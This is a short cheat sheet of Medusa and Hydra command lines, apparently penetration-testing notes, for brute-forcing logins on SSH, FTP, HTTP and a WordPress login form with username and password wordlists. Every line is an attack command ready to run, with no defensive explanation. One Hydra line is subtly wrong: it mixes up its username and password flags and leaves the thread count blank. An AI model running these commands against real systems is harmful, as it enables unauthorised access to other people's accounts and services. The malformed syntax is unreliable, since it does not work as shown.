Medusa
============================================================================

- medusa -h target-ip -u [username] -P ../creds/passwords.txt -M http 

- medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ftp

- medusa -H hosts.txt -U [path to username file] -P [path to password file] -M http 

- medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ssh -n 2222

- medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ftp -O log.txt


Hydra
============================================================================

- hydra -l user -P pass.txt -t 10 172.21.0.0 ssh -s 22

- hydra -l users.txt -p /usr/share/wordlists/rockyou.txt -t 172.21.0.0 ssh -s 22

- hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
